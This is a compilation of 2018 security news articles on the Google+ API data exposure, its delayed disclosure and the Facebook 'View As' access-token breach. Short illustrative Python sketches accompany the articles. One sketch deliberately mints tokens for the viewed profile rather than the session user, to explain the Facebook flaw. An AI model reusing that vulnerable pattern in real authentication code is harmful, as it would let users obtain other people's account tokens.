


Industry Reactions to Google+ Security Incident: Feedback Friday
14.10.2018 securityweek
Social

Google announced this week that it has decided to shut down its Google+ social network. The announcement also revealed the existence of an API bug that exposed personal information from as many as 500,000 accounts.

According to Google, the flaw gave hundreds of third-party apps access to user information such as name, email address, occupation, gender and age. However, the Internet giant said it had found no evidence of abuse.

Google discovered the bug in March 2018, but waited until now to disclose it, which has raised a lot of questions. The Wall Street Journal reported that Google executives decided not to notify users earlier due to concerns it would attract the attention of regulators and draw comparisons to the Cambridge Analytica data privacy scandal that hit Facebook.

Industry reactions to Google+ security incident

Industry professionals have commented on various aspects of the story, including the vulnerability, legal implications, impact on Google, and how APIs can be secured.

And the feedback begins...

Paul Bischoff, Comparitech:

"In my view, Google is basically pleading ignorance in order to shield itself from legal ramifications. It has conveniently left out some crucial figures in its response that would give us a more clear picture of the scope of this incident. For example, Google says 438 applications had unauthorized access to Google+ profile data, but it doesn't say how many of its users used those apps. And while Google says it performed a cursory investigation and found nothing suspicious, it also notes that it didn't actually contact or audit any of the developers of those apps.

As popular and high-profile as Google is, and due to the fact that this vulnerability existed for the better part of three years, it would be reasonable to assume the number of occurrences in which Google+ data was obtained and misused is non-zero.

Although there's no federal breach notification law in the US, every state now has its own breach notification law. However, these laws only apply when it's clear that data was obtained by an unauthorized third party. By turning a blind eye as to whether this occurred and only acknowledging that a vulnerability existed, Google can plead ignorance."

Ilia Kolochenko, CEO, High-Tech Bridge:

"Unlike the recent Facebook breach, this disclosure timeline is incomprehensibly long and will likely provoke a lot of questions from regulatory authorities. Inability to assess and quantify the users impacted does not exempt from disclosure. Although, a security vulnerability per se does not automatically trigger the disclosure duty, in this case it seems that Google has some reasonable doubts that the flaw could have been exploited. Further clarification from Google and technical details of the incident would certainly be helpful to restore confidence and trust among its users currently abandoned in darkness.

Technically speaking, this is one more colourful example that bug bounty is no silver bullet even with the highest payouts by Google. Application security is a multi-layered approach process that requires continuous improvement and adaptation for new risks and threats. Such vulnerabilities usually require a considerable amount of efforts to be detected, especially if it (re)appears on a system that has been already tested. Continuous and incremental security monitoring is vital to maintain modern web systems secure."

Matt Chiodi, VP of Cloud Security, RedLock:

“Given Google's largely stellar reputation, I am shocked that they would purposefully choose to not disclose this incident. We have learned from similar situations that consumers possess a strong ability to forgive when companies take immediate and demonstrable steps to ensure their mistakes are not repeated. Think about J&J with the Tylenol scandal in the 1980s. Because of their swift response, J&J remains one of the most trusted brands. Google could lose a great deal of respect and ultimately revenue if this report is true.”

Bobby S, Red Team, ThinkMarble:

"The fact that Google chose to shut Google+ down on discovering this breach is telling of how serious it is. It appears that a bug in the API for Google+ had been allowing third-party app developers to access the data not just of users who had granted permission, but of their friends. The vast majority of social media platforms that we use every day monetise our data by making it available to 3rd parties via an API, but it is not acceptable that exploitative practices continue.

This has echoes of the Cambridge Analytica scandal that hit Facebook and has led to much greater scrutiny of Facebook’s policies and openness towards how data is accessed, used and shared. Similarly, Google must seriously consider how it continues to operate alongside third-party developers. This is especially relevant now that the GDPR is in force, affecting any company with users in the EU.

As a data controller, under Article 32 of the GDPR, Google now has greater obligations to ensure that its data processors (including third-party app developers) implement measures not only to ensure the security of personal data, but also to gain the proper permissions from individual users to access it. In the wake of this new regulation, these same companies are also now legally required to take appropriate actions to secure and pseudonymize this data before making it available through their services."

Pravin Kothari, CEO, CipherCloud:

“Google’s unofficial motto has long been ‘don’t be evil.’ Alphabet, the Google parent company, adapted this to ‘do the right thing.’

Google’s failure, if the reports are true, to disclose to users the discovery of a bug that gave outside developers access to private data is a recurring theme. We saw recently that Uber was fined for failing to disclose the fact that it had a breach and, instead of disclosing, tried to sweep it under the rug.

It’s not surprising that companies that rely on user data are incented to avoid disclosing to the public that their data may have been compromised, which would impact consumer trust. These are the reasons that the government should and will continue to use in their inexorable march to a unified national data privacy omnibus regulation.

Trust and the cloud do not go together until responsibility is taken for locking down and securing our own data. Even if your cloud provider offers the ability to enforce data protection and threat protection, it is not the provider's data that is compromised and potentially used against them; it is the consumers'.

Enterprises leveraging cloud services need to ensure additional security measures are in place and that data is protected before it is delivered to a third-party cloud service - this is the only way we can ensure data stays protected.”

Colin Bastable, CEO, Lucy Security:

“Don’t be Evil mutated into Don’t be Caught. Google’s understandable desire to hide their embarrassment from regulators and users is the reason why states and the feds impose disclosure requirements – the knock-on effects of security breaches are immense.

The risk of such a security issue is shared by all of the Google users' employers, banks, spouses, colleagues, etc. But I guess we can trust them when we are told there was no problem.”

Etienne Greeff, CTO and co-founder, SecureData:

"The news today that Google covered up a significant data breach, affecting up to 500,000 Google+ users, is unfortunately unsurprising. It’s a textbook example of the unintended consequences of regulation – in forcing companies to comply with tough new security rules, businesses hide breaches and hacks out of fear of being the one company caught in the spotlight.

Google didn’t come clean on the compromise, because they were worried about regulatory consequences. While the tech giant went beyond its “legal requirement in determining whether to provide notice,” it appears that regulation like GDPR is not enough of a deterrent for companies to take the safety of customer data seriously. And so this type of event keeps on happening. While Google has since laid out what it intends to do about the breach in support of affected users, this doesn’t negate the fact that the breach – which happened in March – was ultimately covered up.

However, there are events happening far closer to home that aren’t getting the attention they deserve. We seem to pay more attention to the big tech breaches, while businesses such as the supermarket chain Morrisons face a class action lawsuit for failing to protect deliberately leaked employee data. Last year the High Court ruled that the supermarket was what it termed “vicariously liable”, as the internal auditor in question was acting in the course of his own employment at the company when he leaked that information online. The implications of this type of action are huge – if businesses can be held accountable for the actions of rogue employees acting criminally, then we will have to treat all our employees as malicious threat actors – which is a huge thing to consider and could have momentous repercussions across the globe in all industries.

Until then, we will undoubtedly see even more of this ‘head-in-the-sand’ practice in the future, especially given GDPR is now in force from larger tech firms. It ultimately gives hackers another way of monetising compromises – just like we saw in the case of Uber. This is dangerous practice, and changes need to be made across the technology industry to make it a safer place for all. Currently, business seems to care far more about covering its own back than the compromise of customer data. It’s a fine line to walk."

Bryan Becker, application security researcher, WhiteHat Security:

“Even giants can have security flaws. I’m sure the offices of Facebook breathed a collective sigh of relief today, as they’re pushed out of the headlines by a new privacy breach at competitor Google.

Breaches like this illustrate the importance of continuous testing and active threat modeling, as well as the attention that APIs require for secure development and least information/privilege principles. Companies like Google grow large and fast, and can have a problem keeping every exposed endpoint under scrutiny. No one person can possibly be aware of every use or permutation of a single piece of code or API, or microservice.

For organizations that already have a large architecture, knowing where and how to start evaluating security can be a challenge in and of itself. In these cases, organizations can benefit from active threat modeling – basically a mapping of all front-end services to any other services they talk to (both backend and frontend), often drawn as a flow-chart type of diagram. With this mapping, admins can visualize what services are public facing (as in, need to be secured and tested), as well as what is at risk if those services get compromised. In some ways, this is the first step to taking ‘inventory’ in the infosec world.

Once the landscape is mapped out, automated testing can take a large portion of the strain by continuously scanning various services – even after they become old. Of course, automated testing is not a be-all/end-all solution, but it does carry the benefit that old or unused-but-not-yet-retired services continue to have visibility by the security team, even after most of the engineering team is no longer paying attention or has moved onto more interesting projects.”
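
As a rough illustration of the service mapping Becker describes, the hypothetical Python sketch below builds a small dependency map (the service names are invented) and reports, for each public-facing service, what else would be reachable if that service were compromised. It is a sketch of the idea, not any vendor's tooling.

```python
# Hypothetical sketch of active threat modeling: map which services talk to
# which, mark the public-facing ones, and compute the "blast radius" if one
# public entry point is compromised. Service names are illustrative only.
from collections import deque

service_map = {
    "web-frontend": ["profile-api", "auth-service"],
    "mobile-api": ["profile-api", "media-uploader"],
    "profile-api": ["user-db"],
    "media-uploader": ["object-store", "auth-service"],
    "auth-service": ["user-db"],
    "user-db": [],
    "object-store": [],
}
public_facing = {"web-frontend", "mobile-api"}

def blast_radius(entry_point: str) -> set:
    """Return every downstream service reachable from a compromised entry point."""
    seen, queue = set(), deque([entry_point])
    while queue:
        svc = queue.popleft()
        if svc in seen:
            continue
        seen.add(svc)
        queue.extend(service_map.get(svc, []))
    return seen - {entry_point}

for svc in sorted(public_facing):
    print(f"{svc} is public-facing; compromise exposes: {sorted(blast_radius(svc))}")
```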

Jessica Ortega, website security analyst, SiteLock:

"Google announced that it will be shutting down its controversial social media network Google+ over the next ten months in the wake of a security flaw. This flaw allowed more than 400 apps using the Google+ API to access the personal information of approximately 500,000 users. The flaw was discovered in March, but Google opted not to disclose this vulnerability as it found no evidence that the information had been misused. Additionally, the decision not to disclose the discovered vulnerability speaks to a fear of reputational damage and possible legal ramifications or litigation in light of recent Senate hearings and GDPR.

This type of behavior may become more common among tech companies aiming to protect their reputation in the wake of legislation and privacy laws--they may choose not to disclose vulnerabilities that they are not legally required to report in order to avoid scrutiny or fines. Ultimately it will be up to users to proactively monitor how their data is used and what applications have access to that data by using strong passwords and carefully reviewing access requests prior to using an app like Google+."

Rusty Carter, VP of Product Management, Arxan Technologies:

“This shows yet again that “free” is anything but free. The cost of many of these services is your privacy and your data. In this case, the situation is even worse. Negligence led to more data exposed than intended, and – as the Wall Street Journal reported - Google did not notify users for months about this issue due to fear of disclosure.

While regional legislation may certainly impact how this proceeds, it is clear that consumer awareness of security is increasing quickly and the long term success of businesses will be heavily dependent on their reputation and consumers trust that they are securing and protecting their private and personal information.”

Kevin Whelan, CTO, ITC Secure:

"From a security standpoint, this again highlights the risks of how personal data can be accessed by third parties – in this case names, email, addresses, ages, occupations and relationship status were accessible through an open API.

From a business standpoint, it’s also a blow, as they have had to close the social network, albeit one where the average touch time was five seconds and which was deemed unpopular compared to platforms such as Facebook and Twitter. This bug has been around for a long time, so whilst there’s no evidence that data has been misused, it will require forensic investigation. What’s also surprising here is that Google say they don’t keep logs for more than two weeks, so aren’t able to see what data had been accessed."

Brian Vecci, Technical Evangelist, Varonis:

“This is a breach almost everyone can relate to, because everyone has a Google account and between emails, calendars, documents and other files, lots of people keep a ton of really valuable data in their Google account -- so unauthorised access could be really damaging. On top of that, when you get access to someone’s primary email—which for many people is Gmail, you’ve got the keys to their online life. Not only do you have their login, which is almost always their email, you have the ability to reset any password since password reset links are sent via email. A Gmail breach could be the most damaging breach imaginable for the most number of people the longer it goes undetected. If Google knew about a potential breach and didn’t report it, that’s a huge red flag.

Unlike many other types of accounts, Google serves for many users as the authentication for other apps like Facebook. Last week, Facebook said they had no evidence that linked apps were accessed. But if these linked apps were accessed due to a breach, it could expose all kinds of personal user data. If you’re using Google or Facebook to login to other apps, there is a whole web of information that could be exposed. Breaches like these are the reason why Google, Facebook and other big tech players need to be regulated - they are a gateway to other applications for business and personal use.”


Facebook Says Hackers Accessed Data of 29 Million Users
14.10.2018 securityweek
Social
Facebook Hack Details

Facebook said Friday that hackers accessed personal data of 29 million users in a breach at the world's leading social network disclosed late last month.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

"We now know that fewer people were impacted than we originally thought," Facebook vice president of product management Guy Rosen said in a conference call updating the investigation.

The hackers -- whose identities are still a mystery -- accessed the names, phone numbers and email addresses of 15 million users, he said.

For another 14 million people, the attack was potentially more damaging.

Facebook said cyberattackers accessed that data plus additional information including gender, religion, hometown, birth date and places they had recently "checked in" to as visiting.

No data was accessed in the accounts of the remaining one million people whose "access tokens" were stolen, according to Rosen.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Vulnerability in the code

Facebook said engineers discovered a breach on September 25 and had it patched two days later.

That breach allegedly related to a "view as" feature -- described as a privacy tool to let users see how their profiles look to other people. That function has been disabled for the time being as a precaution.

Facebook reset the 50 million accounts believed to have been affected, meaning users would need to sign back in using passwords.

The breach was the latest privacy embarrassment for Facebook, which earlier this year acknowledged that tens of millions of users had their personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"We face constant attacks from people who want to take over accounts or steal information around the world," chief executive Mark Zuckerberg said on his own Facebook page when the breach was disclosed.

"While I'm glad we found this, fixed the vulnerability, and secured the accounts that may be at risk, the reality is we need to continue developing new tools to prevent this from happening in the first place."

Facebook said it took a precautionary step of resetting "access tokens" for another 40 million accounts which had accessed the "view as" function.

'Seed' accounts

Hackers evidently started the cyber-onslaught on September 14 with 400,000 "seed accounts" they had a hand in or were otherwise close to, according to Rosen.

"The attackers started with a set of accounts they controlled directly, then moved to their friends, and their friend's friends, and so on -- each time taking advantage of the vulnerability," he added.

The exploit allowed hackers to steal copies of access tokens from accounts of "friends" by using the "view as" feature.

Once they had keys to accounts, hackers had the ability to get into them and control them as though they were the real owner.

Hackers could have seen the last four digits of credit card data in people's accounts, with the rest hidden for security, but there was no sign that data was taken, according to Facebook.

Rosen said they had found no reason yet to believe the hackers were interested in people's information; rather, it appeared the mission was to harvest access tokens from friends associated with breached accounts.

He declined to discuss progress regarding figuring out who was behind the attack, saying Facebook had been asked by the FBI to remain quiet on the topic.

The California-based social network says it is cooperating with the FBI, US Federal Trade Commission, Irish Data Protection Commission and other authorities regarding the breach.

Rosen said the FBI investigation also limited what he could disclose about what the hackers' end-goal may have been, but maintained that Facebook had "no reason to believe this attack was related to the mid-term elections" in the US.


Facebook Data Breach Update: attackers accessed data of 29 Million users
13.10.2018 securityaffairs
Social

Facebook data breach – The company provided an update on the data breach it disclosed at the end of September: hackers accessed the personal data of 29 million users.
Facebook announced that hackers accessed the data of 29 million users, fewer than the 50 million initially thought.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Attackers exploited a vulnerability in the “View As” feature, which lets users see how others see their profile, to steal users’ Facebook access tokens.

Earlier this month Facebook revealed attackers chained three bugs to breach the Facebook platform.

“We now know that fewer people were impacted than we originally thought,” said Facebook vice president of product management Guy Rosen in a conference call.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they controlled directly, then expanded their activity through those accounts’ networks of friends.

“First, the attackers already controlled a set of accounts, which were connected to Facebook friends. They used an automated technique to move from account to account so they could steal the access tokens of those friends, and for friends of those friends, and so on, totaling about 400,000 people.” Rosen added.

“In the process, however, this technique automatically loaded those accounts’ Facebook profiles, mirroring what these 400,000 people would have seen when looking at their own profiles. That includes posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations. Message content was not available to the attackers, with one exception. If a person in this group was a Page admin whose Page had received a message from someone on Facebook, the content of that message was available to the attackers.”

Facebook is cooperating with the US authorities, the Irish Data Protection Commission and other authorities regarding the breach.

Rosen confirmed Facebook had “no reason to believe this attack was related to the mid-term elections” in the US.


Facebook Purges 251 Accounts to Thwart Deception
12.10.2018 securityweek
Social

Facebook on Thursday said it shut down 251 accounts for breaking rules against spam and coordinated deceit, some of it by ad farms pretending to be forums for political debate.

The move came as the leading social network strives to prevent the platform from being used to sow division and spread misinformation ahead of US elections in November.

Facebook removed 559 pages and 251 accounts that consistently violated rules against spam and "coordinated inauthentic behavior," according to an online post by cybersecurity policy chief Nathaniel Gleicher and product manager Oscar Rodriguez.

"Many were using fake accounts or multiple accounts with the same names and posted massive amounts of content across a network of Groups and Pages to drive traffic to their websites," they said.

"Many used the same techniques to make their content appear more popular on Facebook than it really was."

Other pages and accounts shut down were "ad farms" using Facebook to trick people into thinking they were forums for legitimate political debate, according to Gleicher and Rodriguez.

Facebook is getting a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections in the US and Brazil.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

Facebook is keen to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election that brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said recently in a post on the social network.

Facebook has started showing who is behind election-related online ads, and has shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to the social network.


Google Says Social Network Bug Exposed Private Data
9.10.2018 securityweek
Social

Google announced Monday it is shutting down the consumer version of its online social network after fixing a bug exposing private data in as many as 500,000 accounts.

The US internet giant said it will "sunset" the Google+ social network for consumers, which failed to gain meaningful traction after being launched in 2011 as a challenge to Facebook.

A Google spokesperson cited "significant challenges in creating and maintaining a successful Google+ that meets consumers' expectations" along with "very low usage" as the reasons for the move.

In March, a security audit revealed a software bug that gave third-party apps access to Google+ private profile data that people meant to share only with friends.

Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

"We found no evidence that any developer was aware of this bug, or abusing the API, and we found no evidence that any profile data was misused," Google said in a blog post.

It was referring to application programming interface software for the social network.

The data involved was limited to optional profile fields, including name, age, gender, occupation and email address, Google said.

Information that could be accessed did not include posts, messages or telephone numbers, a spokesperson said.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"Every year, we send millions of notifications to users about privacy and security bugs and issues," a Google spokesman told AFP.

"Whenever user data may have been affected, we go beyond our legal requirements and apply several criteria focused on our users in determining whether to provide notice."

The company said it determined its course of action based on the data involved in the breach, lack of evidence of misuse and whether it could accurately determine which users to inform.


Google was aware of a flaw that exposed data of over 500,000 Google Plus users, but did not disclose it
9.10.2018 securityaffairs
Social

This is very bad news for Google, which suffered a massive data breach that exposed the private data of over 500,000 Google Plus users to third-party developers.
As a consequence of the data exposure, the company is going to shut down the social media network Google+.

The root cause of the data breach is a security vulnerability affecting one of Google+ People APIs that allowed third-party developers to access data for more than 500,000 users.

Exposed data includes usernames, email addresses, occupation, date of birth, profile photos, and gender-related information.

The worst aspect of the story is that the company did not disclose the flaw in Google+ when it first discovered the issue this spring, because it feared regulatory scrutiny and reputational damage.

“Google exposed the private data of hundreds of thousands of users of the Google+ social network and then opted not to disclose the issue this past spring, in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage, according to people briefed on the incident and documents reviewed by The Wall Street Journal.” reported the Wall Street Journal.

“As part of its response to the incident, the Alphabet Inc. unit on Monday announced a sweeping set of data privacy measures that include permanently shutting down all consumer functionality of Google+.”

Google declared that its experts immediately addressed this vulnerability in March 2018 and that they have found no evidence that any developer has exploited the flaw to access users data. The flaw was present in the Google+ People APIs since 2015.

“We discovered and immediately patched this bug in March 2018. We believe it occurred after launch as a result of the API’s interaction with a subsequent Google+ code change.” reads a blog post published by Google.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API.”

The choice of not disclosing the vulnerability was probably influenced by the Cambridge Analytica scandal that was occurring in the same period.

“A memo reviewed by the Journal prepared by Google’s legal and policy staff and shared with senior executives warned that disclosing the incident would likely trigger “immediate regulatory interest” and invite comparisons to Facebook’s leak of user information to data firm Cambridge Analytica.” continues the WSJ.

Experts believe that the vulnerability in Google+ is similar to the one recently discovered in Facebook API.

Google will shut down the consumer version of Google+ by August 2019 and maintain the service only for enterprise users.

Google also provided information about Project Strobe, a program under which an internal privacy task force has been conducting a companywide audit of the company’s APIs in recent months.

“In a blog post on Monday, Google said it plans to clamp down on the data it provides outside developers through APIs. The company will stop letting most outside developers gain access to SMS messaging data, call log data and some forms of contact data on Android phones, and Gmail will only permit a small number of developers to continue building add-ons for the email service, the company said.” concludes the WSJ.
“The coming changes are evidence of a larger rethinking of data privacy at Google, which has in the past placed relatively few restrictions on how external apps access users’ data, provided those users give permission. Restricting access to APIs will hurt some developers who have been helping Google build a universe of useful apps.”


Facebook Says No Apps Were Accessed in Recent Hack
4.10.2018 securityweek
Social

Facebook has shared another update on the hacker attack disclosed last week. The social media giant says there is no evidence that the attackers accessed any third-party apps.

Facebook revealed on September 28 that it had reset the access tokens for 90 million accounts, including 50 million that were directly impacted and 40 million deemed at risk.

Hackers obtained access tokens for nearly 50 million accounts after exploiting three distinct bugs in the View As feature, which shows users how others see their profile, and a video uploader interface introduced in July 2017. The vulnerability was patched and Facebook informed users in its initial blog post that it had found no evidence of misuse, but noted that its investigation is ongoing.

The company admitted that the attackers could have accessed not only Facebook accounts with the compromised tokens, but also third-party apps that use Facebook login. Resetting the tokens eliminated the risk of unauthorized access to these applications, but Facebook still had to figure out if any apps were accessed during the attack.

A blog post published by the company on Tuesday said there was no evidence of unauthorized access to apps based on an analysis of logs for all third-party apps installed or logged in during the attack.

Facebook has also created a tool to help developers determine if any of their users have been impacted.

“Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users’ access tokens – were automatically protected when we reset people’s access tokens,” explained Guy Rosen, VP of Product Management at Facebook. “However, out of an abundance of caution, as some developers may not use our SDKs — or regularly check whether Facebook access tokens are valid — we’re building a tool to enable developers to manually identify the users of their apps who may have been affected, so that they can log them out.”

Facebook has advised developers to use its official SDKs for Android, iOS and JavaScript as these automatically check the validity of access tokens, and log their users out of the app when error codes show an invalid session.
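
For context on the token checks described above, here is a minimal sketch of one way a third-party developer might verify a user's access token against the Graph API's documented debug_token endpoint and end the local session when the token is no longer valid. The app token value and session handling are placeholders, and this is not Facebook's SDK code.

```python
# Minimal sketch: check whether a user's Facebook access token is still valid
# via the Graph API debug_token endpoint, and log the user out if it is not.
# APP_TOKEN and the session handling are placeholders; error handling is minimal.
import requests

GRAPH_DEBUG_TOKEN = "https://graph.facebook.com/debug_token"
APP_TOKEN = "APP_ID|APP_SECRET"  # app access token (placeholder)

def token_is_valid(user_token: str) -> bool:
    resp = requests.get(
        GRAPH_DEBUG_TOKEN,
        params={"input_token": user_token, "access_token": APP_TOKEN},
        timeout=10,
    )
    data = resp.json().get("data", {})
    return bool(data.get("is_valid"))

def enforce_session(user_id: str, user_token: str) -> None:
    if not token_is_valid(user_token):
        # Token was reset or revoked (e.g. after a mass token reset):
        # end the local session and require the user to log in again.
        print(f"Logging out user {user_id}: Facebook token no longer valid")
```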

Facebook has yet to provide any information on the attackers and their motives, and the attack does not appear to be targeted at a specific country or region.

The social media giant faces lawsuits and government investigations as a result of the incident, and the company’s stock has been steadily falling since the disclosure of the breach. It dropped from nearly $169 on September 27 to just over $159 on Tuesday.


New Twitter Rules Target Fake Accounts, Hackers
2.10.2018 securityweek
Social

Twitter on Monday announced that it has made some changes in preparation for the upcoming midterm elections in the United States. The changes include updated rules that target fake accounts and hackers.

Social media companies have been criticized for allowing their platforms to be abused for influence campaigns ahead of the 2016 presidential election in the U.S. In response, Twitter, Facebook and Google have started taking steps to neutralize these types of operations, particularly by blocking accounts used to spread false information in an effort to manipulate users.

Twitter has now announced some updates on what it described as its “elections integrity efforts,” including changes to the Twitter rules.

The updated Twitter rules target three main issues, and one of them is fake accounts. The social media giant – based on feedback from users – has decided to suspend not just accounts involved in spam campaigns, but also accounts “engaged in a variety of emergent, malicious behaviors.”

The company plans on identifying fake accounts based on several factors, including the use of stock or stolen profile photos, the use of copied profile descriptions, and intentionally misleading profile information, such as location.
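
To illustrate how such signals might feed a review queue, here is a deliberately simplified scoring sketch; the signals, weights and threshold are invented for the example and are not Twitter's actual detection logic.

```python
# Toy scoring sketch for fake-account signals (stock/stolen photos, copied bios,
# misleading location). Weights and threshold are invented for illustration.
from dataclasses import dataclass

@dataclass
class AccountSignals:
    stock_profile_photo: bool
    copied_bio: bool
    misleading_location: bool
    burst_of_identical_tweets: bool

WEIGHTS = {
    "stock_profile_photo": 2,
    "copied_bio": 2,
    "misleading_location": 1,
    "burst_of_identical_tweets": 3,
}
REVIEW_THRESHOLD = 4  # arbitrary cut-off for human review

def suspicion_score(signals: AccountSignals) -> int:
    return sum(weight for name, weight in WEIGHTS.items() if getattr(signals, name))

account = AccountSignals(True, True, False, True)
if suspicion_score(account) >= REVIEW_THRESHOLD:
    print("Flag account for review, score:", suspicion_score(account))
```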

The second key issue targeted by the updated rules is related to “attributed activity.” Twitter will now crack down on accounts that it can reliably link to entities known to have violated its rules. This includes accounts that mimic or aim to replace previously suspended accounts.

Finally, Twitter is targeting accounts that distribute hacking-related materials. Until now, it prohibited the distribution of private information, trade secrets or materials that could cause harm to individuals. The rules have now been expanded to include users that take responsibility for a cyberattack, and ones that make threats or offer incentives to hack specific accounts.

“Commentary about a hack or hacked materials, such as news articles discussing a hack, are generally not considered a violation of this policy,” Twitter representatives wrote in a blog post.

Twitter claims its previously implemented measures are already paying off. The company says it recently removed roughly 50 accounts falsely claiming to be associated with the U.S. Republican party.

“We have also taken action on Tweets sharing media regarding elections and political issues with misleading or incorrect party affiliation information. We continue to partner closely with the RNC, DNC, and state election institutions to improve how we handle these issues,” Twitter said.

The company also pointed out that it recently closed 770 Iran-linked accounts engaging in coordinated manipulation, it challenged millions of potential spam accounts, and it removed hundreds of thousands of apps and tightened access to its API.

Twitter also announced some updates that impact users’ timeline. The company wants to ensure that users receive the most relevant information related to the elections and it’s making it easier for users to identify legitimate candidate accounts. Candidates are being offered increased support and advised to enable two-factor authentication on their account for better security.


Several Bugs Exploited in Massive Facebook Hack
2.10.2018 securityweek
Social

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code and use it to access the targeted user’s account. An attacker would first have to target one of their friends’ accounts and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.
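
To make the third bug concrete, the hypothetical sketch below shows the general class of mistake described: a token minted for the profile being viewed rather than for the authenticated session user, alongside the corrected behaviour. It illustrates the bug class only and is not Facebook's code.

```python
# Illustrative sketch (not Facebook's code) of the token-subject mix-up described
# above: a helper that mints an access token for the profile being *viewed*
# rather than for the user who owns the session, plus the corrected version.
import secrets

def issue_token_buggy(session_user: str, viewed_profile: str) -> dict:
    # BUG: the token subject is the profile being looked up in "View As",
    # so whoever renders the page ends up holding a token for that other user.
    return {"subject": viewed_profile, "token": secrets.token_hex(16)}

def issue_token_fixed(session_user: str, viewed_profile: str) -> dict:
    # Correct: tokens are only ever minted for the authenticated session user,
    # regardless of whose profile is being rendered.
    return {"subject": session_user, "token": secrets.token_hex(16)}

leaked = issue_token_buggy("alice", "bob")
assert leaked["subject"] == "bob"  # Alice, viewing as Bob, now holds a token for Bob
```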

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

Impact on Facebook

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


The Scandals Bedevilling Facebook
2.10.2018 securityweek
Social

Facebook is at the centre of controversy yet again after admitting that up to 50 million accounts were breached by hackers.

